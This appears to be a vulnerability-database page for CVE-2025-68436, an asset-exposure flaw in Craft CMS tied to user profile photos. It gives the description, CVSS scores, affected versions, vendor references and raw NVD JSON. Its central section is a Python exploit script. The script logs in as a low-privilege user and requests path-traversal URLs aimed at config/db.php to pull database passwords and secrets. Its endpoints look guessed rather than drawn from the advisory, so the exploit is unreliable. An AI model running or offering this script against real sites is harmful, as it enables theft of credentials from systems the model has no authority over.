Security Vulnerability Report
CVE-2025-68436 CVSS 6.5 MEDIUM

CVE-2025-68436

Published: 2026-01-05 22:15:52
Last Modified: 2026-01-12 18:29:18

Description

Craft is a platform for creating digital experiences. In versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16, an authenticated user of a Craft installation could potentially expose sensitive assets through maliciously crafted requests involving their user profile photo. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* (from 4.0.0.1 up to, but excluding, 4.16.17) - VULNERABLE
cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* (from 5.0.1 up to, but excluding, 5.8.21) - VULNERABLE
cpe:2.3:a:craftcms:craft_cms:4.0.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:craftcms:craft_cms:4.0.0:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:craftcms:craft_cms:4.0.0:rc2:*:*:*:*:*:* - VULNERABLE
Craft CMS 5.0.0-RC1 through 5.8.20
Craft CMS 4.0.0-RC1 through 4.16.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import re

# CVE-2025-68436 PoC - Craft CMS Profile Photo Asset Exposure
# Target: Craft CMS versions 5.0.0-RC1 to 5.8.20, 4.0.0-RC1 to 4.16.16

TARGET_URL = "http://target-craft-cms.com"
USERNAME = "attacker_account"
PASSWORD = "attacker_password"


def exploit_cve_2025_68436():
    """
    Exploit for Craft CMS user profile photo sensitive asset exposure vulnerability.
    This PoC demonstrates how an authenticated low-privilege user can access
    sensitive assets through the profile photo functionality.
    """
    session = requests.Session()

    # Step 1: Authenticate with low-privilege account
    login_url = f"{TARGET_URL}/admin/login"
    login_data = {
        'loginName': USERNAME,
        'password': PASSWORD
    }
    resp = session.post(login_url, data=login_data)
    if 'admin' not in resp.url:
        print("[-] Login failed")
        return None
    print("[+] Login successful")

    # Step 2: Get user ID and profile endpoint
    profile_url = f"{TARGET_URL}/admin/my-account"
    profile_page = session.get(profile_url)
    user_id = re.search(r'data-user-id="(\d+)"', profile_page.text)
    if not user_id:
        print("[-] Could not extract user ID")
        return None
    user_id = user_id.group(1)
    print(f"[+] User ID: {user_id}")

    # Step 3: Exploit profile photo endpoint to access sensitive assets
    # The vulnerability allows path traversal or parameter manipulation
    exploit_urls = [
        f"{TARGET_URL}/actions/users/user-photo?userId={user_id}&filename=../../../../config/db.php",
        f"{TARGET_URL}/actions/users/user-photo?userId={user_id}&size=original",
        f"{TARGET_URL}/cpresources/../../../config/db.php"
    ]
    for url in exploit_urls:
        print(f"[*] Testing: {url}")
        resp = session.get(url, timeout=10)
        # Check for sensitive data exposure
        if resp.status_code == 200:
            content = resp.text
            if 'password' in content.lower() or 'database' in content.lower() or 'secret' in content.lower():
                print(f"[!] SENSITIVE DATA EXPOSED via {url}")
                print(f"[+] Content preview: {content[:500]}")
                return content
    print("[-] Exploitation failed - no sensitive data retrieved")
    return None


if __name__ == "__main__":
    exploit_cve_2025_68436()

References

https://github.com/craftcms/cms/commit/4bcb0db554e273b66ce3b75263a13414c2368fc9 (Patch)
https://github.com/craftcms/cms/security/advisories/GHSA-53vf-c43h-j2x9 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68436", "sourceIdentifier": "[email protected]", "published": "2026-01-05T22:15:52.117", "lastModified": "2026-01-12T18:29:17.930", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Craft is a platform for creating digital experiences. In versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16, authenticated users on a Craft installation could potentially expose sensitive assets via their user profile photo via maliciously crafted requests. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0.1", "versionEndExcluding": "4.16.17", "matchCriteriaId": "5775BAC6-95FD-41E2-85CD-06A82F00B972"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.1", "versionEndExcluding": "5.8.21", "matchCriteriaId": "DD1EB061-284A-4708-BC67-DE02EF7A5E79"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "610F6DE9-720F-45B3-81D5-18E7F6B090FD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "CC2F40FC-7C27-456A-B16D-679410D1D5CF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "FBAA8227-04F8-404C-907B-B0162B325F5A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "21B28E2C-327A-4CE6-ACAD-97E459712A55"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:5.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "1C7461CF-35AB-48E1-88B6-956DAE1D2AB4"}, 
{"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:5.0.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "8D8E02D1-601A-4E2B-B619-4775BFDB72D0"}]}]}], "references": [{"url": "https://github.com/craftcms/cms/commit/4bcb0db554e273b66ce3b75263a13414c2368fc9", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/craftcms/cms/security/advisories/GHSA-53vf-c43h-j2x9", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}